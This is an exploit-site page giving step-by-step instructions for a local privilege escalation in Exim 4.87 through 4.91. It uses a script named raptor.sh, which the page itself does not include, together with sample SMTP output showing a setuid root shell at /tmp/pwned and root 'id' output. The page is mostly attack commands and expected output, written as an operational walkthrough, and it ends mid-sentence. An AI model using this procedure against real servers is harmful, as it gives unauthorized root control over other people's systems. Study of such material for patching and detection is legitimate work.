## https://sploitus.com/exploit?id=18246B75-1EEB-576A-922A-7076D0D9C473
Cr.Exim 4.87 - 4.91 - Local Privilege Escalation
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.This method requires you to first access the target machine with standard user privileges.
#2.Once you have accessed the target machine, create a script file with the following content:
vi raptor.sh
#3.Copy the code from the provided 'raptor.sh' file. Then, execute the file using the command:
chmod +x raptor.sh
./raptor.sh
#4.You should receive output similar to the example below:
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.Next, execute the following command:
/tmp/pwned
#6.Then, try running 'id' command. If you see the following result:
uid=0(root) gid=0(root) groups=0(root),1001(noob)